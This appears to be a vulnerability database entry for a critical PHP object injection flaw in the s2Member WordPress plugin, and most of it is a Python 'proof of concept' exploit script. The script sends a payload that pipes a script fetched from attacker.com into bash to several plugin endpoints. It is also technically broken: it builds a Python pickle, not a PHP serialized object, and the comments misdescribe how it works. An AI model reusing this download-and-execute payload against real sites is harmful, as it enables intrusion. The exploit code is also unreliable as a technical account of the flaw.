Deserialization of Untrusted Data vulnerability in Cristián Lávaque's s2Member (s2member) WordPress plugin allows PHP Object Injection. This issue affects s2Member from n/a through 250701 (all versions <= 250701).
CVSS Details
CVSS Score: 9.8
Severity: CRITICAL
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Configurations (Affected Products)
No configuration data available.
All versions of the s2Member plugin <= 250701
PoC / Exploit Code
⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import base64
import pickle
import requests

# CVE-2025-58998 PoC - WordPress s2Member Object Injection
# Target: WordPress site with s2Member plugin <= 250701
TARGET_URL = "http://target-wordpress-site.com"


# Generate malicious serialized object for PHP object injection
# This creates a payload that triggers __destruct() or __wakeup() methods
# Note: pickle.dumps() emits a Python pickle stream, not a PHP serialize()
# string, so what is sent below is not a PHP object-injection payload as written.
class EvilClass:
    def __reduce__(self):
        # This will execute system command via eval()
        cmd = "curl https://attacker.com/shell.sh | bash"
        return (eval, (cmd,))


def generate_payload():
    """Generate serialized PHP object for exploitation"""
    evil_obj = EvilClass()
    serialized = pickle.dumps(evil_obj)
    return base64.b64encode(serialized).decode()


def exploit():
    """Send malicious payload to vulnerable endpoint"""
    payload = generate_payload()
    # Target s2Member's processing endpoint
    endpoints = [
        "/wp-admin/admin-ajax.php",
        "/wp-login.php",
        "/?s2member_pro_shortcode_login=1",
    ]
    for endpoint in endpoints:
        data = {
            "action": "s2member_pro_shortcode_login",
            "s2member_pro_logins": payload,
            "s2member_pro_logins_bc": payload,
        }
        try:
            response = requests.post(
                TARGET_URL + endpoint,
                data=data,
                timeout=10,
            )
            print(f"[*] Sent payload to {endpoint}")
            print(f"[*] Response status: {response.status_code}")
        except requests.exceptions.RequestException as e:
            print(f"[!] Error: {e}")


if __name__ == "__main__":
    print("CVE-2025-58998 - s2Member Object Injection PoC")
    exploit()
```